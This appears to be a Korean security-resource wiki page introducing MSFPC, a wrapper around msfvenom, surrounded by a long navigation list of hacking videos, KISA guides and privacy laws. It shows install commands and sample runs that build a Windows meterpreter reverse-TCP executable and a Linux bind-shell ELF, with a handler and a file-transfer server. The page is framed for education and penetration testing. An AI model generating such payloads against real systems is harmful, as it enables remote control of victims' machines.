Security & Hacking
HackingOWASPKISA ReportTrend Report
  • Hacking
    • [Youtube : NetworkChuck] AWS S3 intro to cloud hacking (leaky buckets)
    • [Youtube : NetworkChuck] How to Hack a password // Windows Edition
    • Log4J Exploit Demo
    • Exploitation of a Samsung Galaxy Note 10+ Zero-Click RCE Bug via MMS
    • GPS Spoofing w/ BladeRF - Software Defined Radio Series
    • find info on phone numbers with PhoneInfoga
    • BitWhisper - Jumping the Air-Gap with Heat
    • How to leak sensitive data from an isolated computer (air-gap) to a near by mobile phone
    • Fake Access Point + DNS SPOOFING (ETTERCAP) + Fake Website
    • Unlocking L.A.'s Traffic Grid: Phreaked Out (Episode 1)
    • How to Hack a Car: Phreaked Out (Episode 2)
    • All The Ways To Hack Your Phone: Phreaked Out (Episode 3)
    • Hacking IoT Thermostats
    • WiFi IoT Hacking Demo Guide
    • How to Hack WPA/WPA2 Wi-Fi With Kali Linux Aircrack-ng
    • Exploit CVE-2016-2521 DLL Hijacking Wireshark
    • CVE-2016-4484 : Ubuntu16.04 Enter 30 to shell: Cryptsetup Initram Shell
    • FATMAN CVE-2015-2545 Office 2007 Silent DOC Exploit Domo
    • CVE-2016-2384 proof-of-concept exploit demo
    • Let's See What's Out There - Mapping the Wireless IOT
    • Kali Linux NetzwerkOrdner cracken mit Hydra
    • MySQL/MariaDB/Percona - Race Cond CVE-2016-6663 & Root PrivEsc CVE-2016-6664 PoC Exploits
    • Microsoft Internet Explorer 8, 9, 10, 11 Exploit | CVE-2016-0189
    • MS16-007 CVE-2016-0019 Windows RDP Security Bypass
    • How to Recover Passwords on ZIP Files - fcrackzip
    • NoSQLMap MongoDB Management Attack Demo
    • Exploiting JBOSS with JexBoss
    • Kali Linux Tools - ATSCAN (Advanced Search & Dork Mass Exploit)
    • KADABRA: Automatic LFI Exploiter (all LFI attacks implemented)
    • Hacking with Evilgrade
    • Msfvenom Payload Creator(MPC) in Kali Linux
    • OWASP VBScan 0.1.7 introduction
    • Kali Linux Tools - KickThemOut (Kick devices off your network by performing an ARP Spoof attack)
    • Kali Linux Tools - PENTMENU bash script for recon and DOS attacks
    • Kali Linux 2016.2 - Websploit FrameWork
    • Kali Linux Tools - Miranda
    • Kali Linux | Usage Pupy Remote Administrator Tool
    • SearchSploit Guide | Finding Exploits | Kali Linux
    • FuzzBunch & MSF ShadowBrokers
    • Kali Linux - BeEF & Linode
  • Black-Hat
    • Hiding Behind Android Runtime (ART)
    • Hacking a Professional Drone
    • Bypassing Browser Security Policies for Fun and Profit
    • Relaying EMV Contactless Transactions Using Off-The-Self Android Devices
  • DEFCON
    • DEF CON 24 - Hacking boarding passes for fun and profit
    • DEF CON 24 Internet of Things Village - Elvis Collado - Reversing and Exploiting Embedded Devices
  • Practice
    • [root-me.org] 시스템 취약점 및 다양한 취약점에 대한 연습할 수 있는 사이트
    • Damn Vulnerable Web Services (DVWS) using Docker
  • 무료 교육
    • [KISA] 2022년도 암호모듈검증(KCMVP) 전문교육 신청·접수 안내
  • KISA Secure Report
    • KISA Secure Report - List
    • [KISA] 보이스피싱 대응 방법
    • 2021년_주요정보통신기반시설_기술적_취약점_분석_평가_방법_상세가이드
    • 2019년_공개SW를_활용한_소프트웨어_개발보안_점검가이드
    • 2019년_모바일_전자정부서비스_앱_소스코드_검증_가이드라인
    • 2021년_소프트웨어_개발보안_가이드
    • 2021년_소프트웨어_보안약점_진단가이드
    • 2021년_Python_시큐어코딩_가이드
    • 2015년_모바일_대민서비스_보안취약점_점검_가이드
    • WebKnight 3.1 사용설명서
    • ModSecurity 사용설명서
    • [KISA] 인터넷 브라우저를 더 안전하게!
  • Owasp Top 10
    • OWASP - List
    • OWASP Top 10 (Eng-Link)
    • OWASP 2021's Top 10 (Eng-Link)
    • OWASP 2021's Top 10 (Eng-PDF-Download)
    • OWASP 2017's Top 10 (Kor-PDF-Download)
    • OWASP 2017's Top 10 (Kor-PPTS-Download)
    • OWASP 2013's Top 10 (Kor-PDF-Download)
  • OWASP 2010's Top 10 (Kor-PDF-Download)
  • Privacy-law-Data
    • PRIVACY LAW DATA - List
    • 개인정보_보호법
    • 개인정보_보호법_시행령
    • 신용정보의_이용_및_보호에_관한_법률
    • 국가인권위원회법
    • 공공기관의_운영에_관한_법률
    • 지방공기업법
    • 초·중등교육법
    • 고등교육법
    • 주민등록법
    • 전자정부법
    • 전자서명법
    • 공공기관의_정보공개에_관한_법률
  • PRIVACY-Administrative-Rule
    • PRIVACY Administrative-RULE - List
    • 개인정보_처리_방법에_관한_고시
    • 개인정보의_안전성_확보조치_기준
    • 개인정보의_기술적ㆍ관리적_보호조치_기준
    • 표준_개인정보_보호지침
    • 개인정보_영향평가에_관한_고시
    • 개인정보_보호_자율규제단체_지정_등에_관한_규정
    • 정보보호_및_개인정보보호_관리체계_인증_등에_관한_고시
    • 가명정보의_결합_및_반출_등에_관한_고시
    • 공공기관의_가명정보_결합_및_반출_등에_관한_고시
    • 경찰청_개인정보_보호_규칙
    • 경찰청_영상정보처리기기_운영규칙
    • 주민등록증발급신청서등의_관리에_관한_규칙
    • 국토교통부_개인정보보호_세부지침
    • 기상청_개인정보_보호지침
    • 농림축산식품부_개인정보보호지침
    • 문화체육관광부_개인정보_보호지침
    • 법무부_개인정보_보호지침
    • 병무청_개인정보보호_관리규정
    • 병무행정_정보업무_관리규정
    • 산림청_개인정보_보호지침
    • 중소벤처기업부_개인정보_보호지침
    • 통계청_개인정보보호_지침
    • 행정안전부_개인정보보호_지침
    • 환경부_개인정보_보호지침
  • Trend Report
    • Secure Trend Report
    • 사이버 위협 동향보고서(2021년 하반기)
    • 사이버 위협 동향보고서(2021년 상반기)
    • 2021년 상반기 악성코드 은닉사이트 탐지 동향 보고서
    • 2021년 하반기 악성코드 은닉사이트 탐지 동향 보고서
    • 2021년 랜섬웨어 스페셜 리포트
    • cyber security advisory 2022
  • kisa-isms-p
    • [KISA] ISMS/ISMS-P 관련 정보
    • [KISA] ISMS-P 인증기준 안내서 (2022.04) [PDF]
    • [KISA] ISMS-P 세부점검항목 공지 (2022.04.22) [xlsx]
    • [KISA] ISMS-P 인증제도 안내서 (2021.07) [PDF]
    • [KISA] 정보보호_관리체계(ISMS)_인증제도_안내서(2017.04) [PDF]
  • KISA-PIMS
    • [KISA] PIMS 관련 정보
    • [KISA] PIMS 인증제도 안내서(1권) - 제도운영편 [PDF]
    • [KISA] PIMS 인증제도 안내서(2권) - 인증기준편 [PDF]
    • [KISA] PIMS_인증기준_세부점검항목(2016.11.09) [xlsx]
  • 기타자료
    • [KISA] 랜섬웨어 대응 가이드라인('23년 개정본)
    • [금융감독원/DAXA] 가상자산 연계 투자사기 사례 7선
    • 피싱 사이트 확인 하는 방법
    • [KISA] 랜섬웨어 복구도구 모음
    • 베라크립트(VeraCrypt) 을 이용하여 암호화된 가상 디스크 만들기
  • 쉼터
    • 탑툰-선생님의 노력[19금]
    • 탑툰-보스의 딸[19금]
    • 탑툰-나의 일러레님[19금]
    • 탑툰-요구르트 아줌마[19금]
    • 탑툰-내 맘대로 장모님[19금]
    • 탑툰-치한중독[19금]
    • 탑툰-구멍가게 구멍열었습니다[19금]
    • 탑툰 취화점
    • 탑툰-여동생이랑 비밀 레슨[19금]
    • 탑툰-건물주 누나[19금]
    • 탑툰-치킨클럽[19금]
    • 탑툰-모비딕[19금]
    • 탑툰-그 남자의 공부법[19금]
    • 탑툰-엄마야 누나야[19금]
    • 탑툰-최면으로 그녀들을 함락시키는 법[19금]
    • 탑툰-뺏는 남자[19금]
    • 탑툰-도서정벌9부
    • 탑툰-괴
    • 탑툰-학사신공
    • 탑툰-열혈강호
Powered by GitBook
On this page
  • 제목 : Msfvenom Payload Creator(MPC) in Kali Linux
  • 내용 :
  • Description
  • Infomatio :

Was this helpful?

  1. Hacking

Msfvenom Payload Creator(MPC) in Kali Linux

[Youtube Data] Public Data - [Kali Linux - Msfvenom Payload Creator]

PreviousHacking with EvilgradeNextOWASP VBScan 0.1.7 introduction

Last updated 3 years ago

Was this helpful?

2022년 NHN Cloud 무료 교육일정 :

제목 : Msfvenom Payload Creator(MPC) in Kali Linux

주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.

Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.

내용 :

MPC 툴 에 대한 사용 하는 방법인 영상입니다.

Description

Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).

  • Can't remember your IP for a interface? Don't sweat it, just use the interface name: eth0.

  • Don't know what your external IP is? MPC will discover it: wan.

  • Want to generate one of each payload? No issue! Try: loop.

  • Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: batch(for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

Infomatio :

## Install

  • Designed for Kali Linux v2.x/Rolling & Metasploit v4.11+.

  • Kali v1.x should work.

  • OSX 10.11+ should work.

  • Weakerth4n 6+ should work.

  • ...nothing else has been tested.

$ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
$ chmod 0755 /usr/local/bin/msfpc
root@kali:~# apt install -y msfpc

Example #1

$ bash msfpc.sh windows 192.168.1.10
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]   IP: 192.168.1.10
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
  > '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

Example #2

$ ./msfpc.sh elf bind eth0 4444 verbose
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]        IP: 192.168.103.142
 [i]      PORT: 4444
 [i]      TYPE: linux (linux/x86/shell/bind_tcp)
 [i]     SHELL: shell
 [i] DIRECTION: bind
 [i]     STAGE: staged
 [i]    METHOD: tcp
 [i]       CMD: msfvenom -p linux/x86/shell/bind_tcp -f elf \
  --platform linux -a x86 -e generic/none  LPORT=4444 \
  > '/root/linux-shell-staged-bind-tcp-4444.elf'

 [i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf'

 [i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
 [i] Size: 4.0K
 [i]  MD5: eed4623b765eea623f2e0206b63aad61
 [i] SHA1: 0b5dabd945ef81ec9283768054b3c22125aa9185

 [i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
 [i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

GitHub :

Kali Linux : MSFPC is already in , so all you have to-do is:

2022년 NHN Cloud 무료 교육일정 :

https://doc.skill.or.kr/2022-NHN-Cloud-Education
https://github.com/g0tmi1k/msfpc
packaged
Kali Rolling
https://doc.skill.or.kr/2022-NHN-Cloud-Education
시연 영상